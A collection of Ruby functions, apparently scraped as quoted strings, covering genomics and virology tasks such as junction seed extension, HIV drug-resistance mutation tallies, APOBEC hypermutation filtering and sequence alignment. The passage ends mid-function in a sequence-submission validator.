"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def detect_long_insertion(insert_pair, clip_Bs2, clip_Fs2, unmap_seq, alt_read_depth=5)\n paired_indel_list = []\n insert_pair.each do |consensus_b, consensus_f|\n total_depth = consensus_b.depth + consensus_f.depth\n clip_chrpos_all = [consensus_b.start_pos, consensus_b.end_pos, consensus_f.start_pos, consensus_f.end_pos]\n clip_start = clip_chrpos_all.min\n clip_end = clip_chrpos_all.max\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 1.0) # %identity = 1.0\n consensus, trim_flag = trim_consensus(consensus)\n # ---------------------------------------------------------------------------\n\n if consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( > 2), uncomplete Long Insertion\n #puts \"uncomplete long insertion...\"\n\n # re-alignement using unmapped read\n can_use_unmaps = unmap_seq.find_all do | unmap|\n (unmap.start_pos < clip_start && clip_start < unmap.end_pos) || (unmap.start_pos < clip_end && clip_end < unmap.end_pos)\n end\n if can_use_unmaps.empty? # unmap read is nothing\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n\n else # unmap reads exist\n new_group_reads = ([consensus_b, consensus_f] + can_use_unmaps)\n new_consensus, _ = mafft_consensus(new_group_reads, 1.0) # make a consensus seq with the unmapped reads\n new_consensus, trim_flag = trim_consensus(new_consensus)\n\n if new_consensus.empty? || new_consensus.count(\"?\") > 2 # SNP check, if the number of SNPs is more than 2 ( >=3)\n clip_B_stt = consensus_b.start_pos # clip_B start pos\n clip_F_end = consensus_f.end_pos # clip_F end pos\n upper_LI = clip_Bs2[clip_B_stt]\n bottom_LI = clip_Fs2[clip_F_end]\n consensus = \"#{upper_LI}-----#{bottom_LI}\"\n if total_depth >= alt_read_depth # end pos is equal to sttpos\n paired_indel_list << Read.new(type: :ULI, start_pos: clip_B_stt, end_pos: clip_B_stt, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n else\n new_consensus, _ = mafft_consensus(new_group_reads, 0.5) # make a consensus seq with the unmapped reads\n new_consensus = trim_consensus_with_flag(new_consensus, trim_flag)\n\n new_total_depth = new_group_reads.inject(0){|res, read| res += read.depth}\n if new_total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI_wU, start_pos: clip_start, end_pos: clip_end, seq: new_consensus, depth: new_total_depth)\n @mafft_inputs[paired_indel_list.last] = new_group_reads if @mafft_inputs\n end\n end\n end\n\n else\n consensus, _ = mafft_consensus([consensus_b, consensus_f], 0.5) # %identity = 0.5, consensus update\n consensus = trim_consensus_with_flag(consensus, trim_flag)\n\n #puts \"complete long insertion...\"\n #puts align_reads_names\n #puts\n if total_depth >= alt_read_depth ####\n paired_indel_list << Read.new(type: :LI, start_pos: clip_start, end_pos: clip_end, seq: consensus, depth: total_depth)\n @mafft_inputs[paired_indel_list.last] = [consensus_b, consensus_f] if @mafft_inputs\n end\n end\n end\n return paired_indel_list\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def checkCompatibility(sampleTypes, expectedLengths) \n # can't run RNA and DNA together! error if attempted\n if(sampleTypes.uniq.length>1)\n return 0\n end\n end",
"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def test_project_from_assembly_to_contigs_with_strand_and_ending_in_gaps\n # This chromosomal region is covered by 2 contigs and 2 gaps at the end: GaCoGaCoGa\n assert_equal(5, @target_slices_contigs_with_strand_ends_in_gaps.length)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[0].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand_ends_in_gaps[1].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[2].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:5704:1', @target_slices_contigs_with_strand_ends_in_gaps[3].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[4].class)\n end",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def validation_submission(params)\n\n possible_errors = Array.new\n\n aa_seq_array = is_sequence_empty(params[:aa_sequence], params[:aa_fasta])\n puts \"aa_seq_array => #{aa_seq_array}\"\n # if user submit more than 20 sequence at time, return error immediately\n if !aa_seq_array.nil? and aa_seq_array.length > 20\n possible_errors << \"You submitted more than 20 amino acid sequences. While, we only accept 20 amino acid sequences or less per submission.\"\n return possible_errors\n end\n\n nt_seq_array = is_sequence_empty(params[:nt_sequence], params[:nt_fasta])\n puts \"nt_seq_array => #{nt_seq_array}\"\n if !nt_seq_array.nil? and nt_seq_array.length > 20\n possible_errors << \"You submitted more than 20 nucleotide sequences. While, we only accept 20 nucleotide sequences or less per submission.\"\n return possible_errors\n end\n\n\n if aa_seq_array.nil? or nt_seq_array.nil?\n possible_errors << \"Either your amino acid sequence or nucleotide sequence are empty\"\n return possible_errors\n end\n\n # Check aa sequence \n aa_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n aa_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n aa_sequence_definition = parse_definition(query.definition)\n\n aa_sequence = validate_seq(query.to_seq.seq,\"aa\") # fail return nil; success return 0\n # puts \"validation aa_sequence => #{aa_sequence}\"\n if aa_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if aa_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !aa_sequence_definition.nil? and !aa_sequence.nil?\n aa_sequence_hash[aa_sequence_definition[0]] = query.to_seq.seq\n\n header_array << aa_sequence_definition[0].strip\n accession_no_array << aa_sequence_definition[1].strip\n end\n \n end\n \n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following amino acid sequences are not following our submission rules\\n\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed amino acid sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n\n return possible_errors\n\n end\n\n # check uniqueness of header\n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n # check if the accession number is validate or not\n # we only check the correctness of aa accession number; not gene; since we only care one accession number\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"aa\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have invalid accession number from NCBI. Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n ########################################################################################\n # Check nt sequence\n nt_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n nt_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n nt_sequence_definition = parse_definition(query.definition)\n nt_sequence = validate_seq(query.to_seq.seq,\"nt\")\n \n # puts \"validation nt_sequence => #{nt_sequence}\"\n if nt_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if 